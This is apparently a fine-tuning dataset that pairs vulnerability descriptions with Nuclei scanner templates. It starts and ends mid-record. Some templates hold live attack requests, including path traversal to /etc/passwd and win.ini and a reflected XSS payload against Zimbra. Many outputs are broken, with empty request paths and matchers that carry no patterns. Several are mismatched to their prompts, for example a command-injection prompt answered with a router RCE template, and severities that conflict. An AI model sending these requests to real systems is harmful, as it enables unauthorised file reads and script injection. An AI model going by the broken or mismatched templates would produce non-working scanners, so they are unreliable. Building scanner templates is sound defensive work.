detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: golden-ftp-detect\n\ninfo:\n name: Golden FTP Server Pro Service - Detect\n author: pussycat0x\n severity: info\n description: Golden FTP Server Pro service was detected.\n tags: network,ftp,golden,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "golden-ftp-detect"} {"instruction": "Generate a Nuclei template for CVE-2018-12909", "input": "Title: Path Traversal in webgrind_project webgrind\nSummary: Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI. NOTE: the vendor indicates that the product is not intended for a \"publicly accessible environment.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: webgrind_project webgrind\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-12909\n\ninfo:\n name: Webgrind <= 1.5 - Local File Inclusion\n author: DhiyaneshDk\n severity: high\n description: Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI\n tags: cve,cve2018,lfi,webgrind,webgrind_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd\" \n matchers:\n - type: regex\n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2018-12909"} {"instruction": "Generate a Nuclei template for CVE-2018-20010", "input": "Title: Cross-Site Scripting (XSS) in domainmod domainmod\nSummary: DomainMOD 4.11.01 has XSS via the assets/add/ssl-provider-account.php username field.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: domainmod domainmod\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-20010\n\ninfo:\n name: DomainMOD 4.11.01 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field.\n tags: cve,cve2018,domainmod,xss,authenticated,edb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2018-20010"} {"instruction": "Generate a Nuclei template for: Helm Dashboard - Exposure", "input": "Title: Helm Dashboard - Exposure\nSummary: Helm Dashboard - Exposure. Tags: helm, exposure, dashboard\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: helm-dashboard-exposure\n\ninfo:\n name: Helm Dashboard - Exposure\n author: DhiyaneshDk\n severity: medium\n description: Helm Dashboard - Exposure\n tags: helm,exposure,dashboard,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Helm Dashboard\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "helm-dashboard-exposure"} {"instruction": "Generate a Nuclei template for: SmokePing Latency Page for Network Latency Grapher", "input": "Title: SmokePing Latency Page for Network Latency Grapher\nSummary: SmokePing Latency Page for Network Latency Grapher. SmokePing Latency Page is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: smokeping-grapher\n\ninfo:\n name: SmokePing Latency Page for Network Latency Grapher\n author: DhiyaneshDk\n severity: low\n description: SmokePing Latency Page is exposed.\n tags: misconfig,smokeping,latency,grapher,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/smokeping/\" \n matchers:\n - type: word\n words:\n - \"SmokePing Latency Page for\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "smokeping-grapher"} {"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: seowon-router-rce\n\ninfo:\n name: Seowon 130-SLC router - Remote Code Execution\n author: gy741\n severity: critical\n description: Seowon 130-SLC router lets remote attackers execute commands without authentication as admin users via the router ip & Port(if available) in the request.\n tags: unauth,iot,edb,rce,seowon,router,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-77"} {"instruction": "Generate a Nuclei template for CVE-2021-37589", "input": "Title: SQL Injection in virtuasoftware cobranca\nSummary: Virtua Cobranca before 12R allows SQL Injection on the login page.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: virtuasoftware cobranca\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-37589\n\ninfo:\n name: Virtua Software Cobranca <12R - Blind SQL Injection\n author: princechaddha\n severity: high\n description: Virtua Cobranca before 12R allows blind SQL injection on the login page.\n tags: cve,cve2021,virtua,sqli,virtuasoftware,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: or\n - type: dsl", "category": "cve", "severity": "high", "id": "CVE-2021-37589"} {"instruction": "Generate a Nuclei template for: Airtable API Key", "input": "Title: Airtable API Key\nSummary: Airtable API Key. Tags: airtable, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: airtable-api-key\n\ninfo:\n name: Airtable API Key\n author: DhiyaneshDK\n severity: info\n description: Airtable API Key\n tags: airtable,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "airtable-api-key"} {"instruction": "Generate a Nuclei template for: PHP Source - Backup File Information Disclosure", "input": "Title: PHP Source - Backup File Information Disclosure\nSummary: PHP Source - Backup File Information Disclosure. PHP Source File is disclosed to external users.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: php-backup-files\n\ninfo:\n name: PHP Source - Backup File Information Disclosure\n author: StreetOfHackerR007,pwnhxl,mastercho,0xpugal\n severity: medium\n description: PHP Source File is disclosed to external users.\n tags: exposure,backup,php,disclosure,fuzz,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}{{filepath}}{{bakext}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\" \n - \"($\" \n - \"$_GET[\" \n - \"$_POST[\" \n - \"$_REQUEST[\" \n - \"$_SERVER[\" \n - \"'DB_PASSWORD'\" \n - \"'DBPASS'\" \n - \"'dbname'\" \n - \"'database_name'\" \n - \"database_type\" \n - \"_DB_NAME_\" \n - \"define('DB\" \n - \"environments:\" \n part: body\n condition: or\n - type: word\n words:\n - \"text/plain\" \n - \"bytes\" \n part: header\n condition: or", "category": "generic", "severity": "medium", "id": "php-backup-files"} {"instruction": "Generate a Nuclei template for: GitLab Personal Access Token", "input": "Title: GitLab Personal Access Token\nSummary: GitLab Personal Access Token. Tags: file, keys, gitlab\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gitlab-personal-accesstoken\n\ninfo:\n name: GitLab Personal Access Token\n author: DhiyaneshDK\n severity: info\n description: GitLab Personal Access Token\n tags: file,keys,gitlab,token\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "gitlab-personal-accesstoken"} {"instruction": "Generate a Nuclei template for CVE-2020-27481", "input": "Title: SQL Injection in goodlayers good_learning_management_system\nSummary: An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: goodlayers good_learning_management_system\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-27481\n\ninfo:\n name: Good Layers LMS Plugin <= 2.1.4 - SQL Injection\n author: edoardottt\n severity: critical\n description: An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n tags: time-based-sqli,cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2020-27481"} {"instruction": "Generate a Nuclei template for: PrettyLinks \u2013 Affiliate Links, Link Branding, Link Tracking, Marketing and Stripe Payments Plugin Detection", "input": "Title: PrettyLinks \u2013 Affiliate Links, Link Branding, Link Tracking, Marketing and Stripe Payments Plugin Detection\nSummary: PrettyLinks \u2013 Affiliate Links, Link Branding, Link Tracking, Marketing and Stripe Payments Plugin Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-pretty-link\n\ninfo:\n name: PrettyLinks \u2013 Affiliate Links, Link Branding, Link Tracking, Marketing and Stripe Payments Plugin Detection\n author: ricardomaia\n severity: info\n description: PrettyLinks \u2013 Affiliate Links, Link Branding, Link Tracking, Marketing and Stripe Payments Plugin Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-pretty-link"} {"instruction": "Generate a Nuclei template for CVE-2018-14013", "input": "Title: Cross-Site Scripting (XSS) in synacor zimbra_collaboration_suite\nSummary: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: synacor zimbra_collaboration_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-14013\n\ninfo:\n name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.\n tags: cve,cve2018,xss,zimbra,synacor,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2018-14013"} {"instruction": "Generate a Nuclei template to detect Use of Weak Credentials", "input": "Title: Use of Weak Credentials (CWE-1391)\nSummary: The product uses weak credentials (such as a default key or hard-coded password) that can be calculated, derived, reused, or guessed by an attacker. By design, authentication protocols try to ensure that attackers must perform brute force attacks if they do not know the credentials such as a key or password. However, when these credentials are easily predictable or even fixed (as with default or hard-coded passwords and keys), then the attacker can defeat the mechanism without relying on brute f\nVulnerability Type: Use of Weak Credentials\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: wordpress-weak-credentials\n\ninfo:\n name: WordPress - Weak Credentials\n author: evolutionsec\n severity: critical\n description: Weak WordPress Credentials were discovered.\n tags: wordpress,default-login,fuzz,fuzzing,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-admin\" \n - \"wordpress_logged_in\" \n part: header\n condition: and\n - type: status\n status:\n - 302", "category": "cwe", "severity": "medium", "id": "CWE-1391"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: axigen-webmail\n\ninfo:\n name: Axigen WebMail PanelDetection\n author: dhiyaneshDk,idealphase\n severity: info\n description: An Axigen webmail panel was discovered.\n tags: axigen,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: maintainer-account\n\ninfo:\n name: Fortinet Maintainer Account Not Implemented - Detect\n author: pussycat0x\n severity: info\n description: In Fortinet, if a FortiGate is compromised and the password is not recoverable, a maintainer account can be used by an administrator with physical access to log into CLI.\n tags: audit,config,file,firewall,fortigate\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: wufoo takeover detection", "input": "Title: wufoo takeover detection\nSummary: wufoo takeover detection. wufoo takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: wufoo-takeover\n\ninfo:\n name: wufoo takeover detection\n author: pdteam\n severity: high\n description: wufoo takeover was detected.\n tags: takeover,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"Profile not found\" \n - \"Hmmm....something is not right.\" \n condition: and", "category": "generic", "severity": "high", "id": "wufoo-takeover"} {"instruction": "Generate a Nuclei template for CVE-2022-29078", "input": "Title: Code Injection in ejs ejs\nSummary: The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).\nVulnerability Type: Code Injection\nSeverity: critical\nAffected Products: ejs ejs\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-29078\n\ninfo:\n name: Node.js Embedded JavaScript 3.1.6 - Template Injection\n author: For3stCo1d\n severity: critical\n description: Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"You are viewing page number\" \n part: body", "category": "cve", "severity": "critical", "id": "CVE-2022-29078"} {"instruction": "Generate a Nuclei template for CVE-2021-21234", "input": "Title: Path Traversal in spring-boot-actuator-logview_project spring-boot-actuator-logview\nSummary: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package \"eu.hinsch:spring-boot-actuator-logview\". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: spring-boot-actuator-logview_project spring-boot-actuator-logview\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-21234\n\ninfo:\n name: Spring Boot Actuator Logview Directory Traversal\n author: gy741,pikpikcu\n severity: high\n description: spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package \"eu.hinsch:spring-boot-actuator-logview\".\n tags: cve2021,cve,springboot,lfi,actuator,spring-boot-actuator-logview_project,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\" \n - \"{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../\" \n - \"{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../\" \n - \"{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../\" \n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2021-21234"} {"instruction": "Generate a Nuclei template for: OpenStack User Secrets Exposure", "input": "Title: OpenStack User Secrets Exposure\nSummary: OpenStack User Secrets Exposure. Internal user_secrets.yml file is exposed in OpenStack.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: openstack-user-secrets\n\ninfo:\n name: OpenStack User Secrets Exposure\n author: geeknik\n severity: high\n description: Internal user_secrets.yml file is exposed in OpenStack.\n tags: openstack,config,exposure,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/user_secrets.yml\" \n - \"{{BaseURL}}/user_secrets.yml.old\" \n matchers:\n - type: word\n words:\n - \"_password:\" \n - \"OpenStack environment\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "openstack-user-secrets"} {"instruction": "Generate a Nuclei template for: Cargo Lock Packages Disclosure", "input": "Title: Cargo Lock Packages Disclosure\nSummary: Cargo Lock Packages Disclosure. Tags: exposure, files, cargo\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cargo-lock-package\n\ninfo:\n name: Cargo Lock Packages Disclosure\n author: DhiyaneshDk\n severity: info\n description: Cargo Lock Packages Disclosure\n tags: exposure,files,cargo,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Cargo.lock\" \n matchers:\n - type: word\n words:\n - \"[[package]]\" \n - \"dependencies = [\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cargo-lock-package"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sitecore-login-panel\n\ninfo:\n name: Sitecore Admin Login Panel - Detect\n author: b4uh0lz\n severity: info\n description: Sitecore admin login panel was detected.\n tags: panel,sitecore,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sitecore/admin/login.aspx\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Sitecore Login\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: EmpireCMS Detect", "input": "Title: EmpireCMS Detect\nSummary: EmpireCMS Detect. Tags: tech, empirecms, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: empirecms-detect\n\ninfo:\n name: EmpireCMS Detect\n author: princechaddha\n severity: info\n description: EmpireCMS Detect\n tags: tech,empirecms,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "empirecms-detect"} {"instruction": "Generate a Nuclei template for: Joomla! htaccess file disclosure", "input": "Title: Joomla! htaccess file disclosure\nSummary: Joomla! htaccess file disclosure. Joomla! has an htaccess file to store configurations about HTTP config, directory listing, etc.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: joomla-htaccess-file\n\ninfo:\n name: Joomla! htaccess file disclosure\n author: oppsec\n severity: info\n description: Joomla! has an htaccess file to store configurations about HTTP config, directory listing, etc.\n tags: miscellaneous,misc,joomla,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/htaccess.txt\" \n matchers:\n - type: word\n words:\n - \"Joomla\" \n - \"Open Source Matters. All rights reserved\" \n condition: and\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "joomla-htaccess-file"} {"instruction": "Generate a Nuclei template for: Bottle - Out of Band Template Injection", "input": "Title: Bottle - Out of Band Template Injection\nSummary: Bottle - Out of Band Template Injection. Tags: ssti, dast, oast\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: bottle-oob\n\ninfo:\n name: Bottle - Out of Band Template Injection\n author: 0xAwali,DhiyaneshDK\n severity: high\n description: Bottle - Out of Band Template Injection\n tags: ssti,dast,oast,oob,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "bottle-oob"} {"instruction": "Generate a Nuclei template for: Akismet Anti-spam' Spam Protection Detection", "input": "Title: Akismet Anti-spam' Spam Protection Detection\nSummary: Akismet Anti-spam' Spam Protection Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-akismet\n\ninfo:\n name: Akismet Anti-spam' Spam Protection Detection\n author: ricardomaia\n severity: info\n description: Akismet Anti-spam' Spam Protection Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/akismet/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-akismet"} {"instruction": "Generate a Nuclei template for CVE-2020-12447", "input": "Title: Path Traversal in onkyo tx-nr585_firmware\nSummary: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal, as demonstrated by reading /etc/shadow.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: onkyo tx-nr585_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-12447\n\ninfo:\n name: Onkyo TX-NR585 Web Interface - Directory Traversal\n author: 0x_Akoko\n severity: high\n description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.\n tags: cve,cve2020,onkyo,lfi,traversal,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-12447"} {"instruction": "Generate a Nuclei template for: Health Check & Troubleshooting Detection", "input": "Title: Health Check & Troubleshooting Detection\nSummary: Health Check & Troubleshooting Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-health-check\n\ninfo:\n name: Health Check & Troubleshooting Detection\n author: ricardomaia\n severity: info\n description: Health Check & Troubleshooting Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/health-check/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-health-check"} {"instruction": "Generate a Nuclei template for CVE-2021-37580", "input": "Title: Authentication Bypass in apache shenyu\nSummary: A flaw was found in Apache ShenYu Admin. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. This issue affected Apache ShenYu 2.3.0 and 2.4.0\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: apache shenyu\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-37580\n\ninfo:\n name: Apache ShenYu Admin JWT - Authentication Bypass\n author: pdteam\n severity: critical\n description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.\n tags: cve2021,cve,apache,jwt,shenyu,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"query success\" \n - \"\"userName\":\"admin\"\" \n - \"\"code\":200\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-37580"} {"instruction": "Generate a Nuclei template for: Freshbooks Access Token", "input": "Title: Freshbooks Access Token\nSummary: Freshbooks Access Token. Tags: freshbooks, file, keys\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: freshbooks-access-token\n\ninfo:\n name: Freshbooks Access Token\n author: DhiyaneshDK\n severity: info\n description: Freshbooks Access Token\n tags: freshbooks,file,keys\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "freshbooks-access-token"} {"instruction": "Generate a Nuclei template for CVE-2021-44427", "input": "Title: SQL Injection in rosariosis rosariosis\nSummary: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) before 8.1.1 allows remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: rosariosis rosariosis\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-44427\n\ninfo:\n name: Rosario Student Information System Unauthenticated SQL Injection\n author: furkansayim,xShuden\n severity: critical\n description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.\n tags: cve,cve2021,sqli,rosariosis,vkev,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/Side.php\" \n matchers:\n - type: word\n words:\n - \"DB Execute Failed. ERROR:\" \n - \"unterminated quoted string\" \n part: body\n condition: and\n - type: word\n words:\n - \"RosarioSIS=\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-44427"} {"instruction": "Generate a Nuclei template to detect Exposure of Resource to Wrong Sphere", "input": "Title: Exposure of Resource to Wrong Sphere (CWE-668)\nSummary: The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing t\nVulnerability Type: Exposure of Resource to Wrong Sphere\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: sicom-mgrng-login\n\ninfo:\n name: Sicom MGRNG - Administrative Login Found\n author: sullo\n severity: info\n description: Sicom MGRNG administrative login page found.\n tags: sicom,mgrng,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/~sicom/mgrng/LoginForm.php\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"MGRNG Login\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-668"} {"instruction": "Generate a Nuclei template for: Go pprof Debug Page", "input": "Title: Go pprof Debug Page\nSummary: Go pprof Debug Page. go pprof debug page was exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: go-pprof-debug\n\ninfo:\n name: Go pprof Debug Page\n author: w8ay\n severity: low\n description: go pprof debug page was exposed.\n tags: logs,exposure,go,pprof,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/debug/pprof/heap?debug=1\" \n - \"{{BaseURL}}/pprof/heap?debug=1\" \n matchers:\n - type: word\n words:\n - \"heap profile:\" \n - \"Alloc\" \n condition: and\n - type: word\n words:\n - \"text/plain\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "go-pprof-debug"} {"instruction": "Generate a Nuclei template for CVE-2023-0676", "input": "Title: Cross-Site Scripting (XSS) in phpipam phpipam\nSummary: Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: phpipam phpipam\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-0676\n\ninfo:\n name: phpIPAM 1.5.1 - Cross-site Scripting\n author: ritikchaddha\n severity: medium\n description: Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.\n tags: cve,cve2023,phpipam,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", 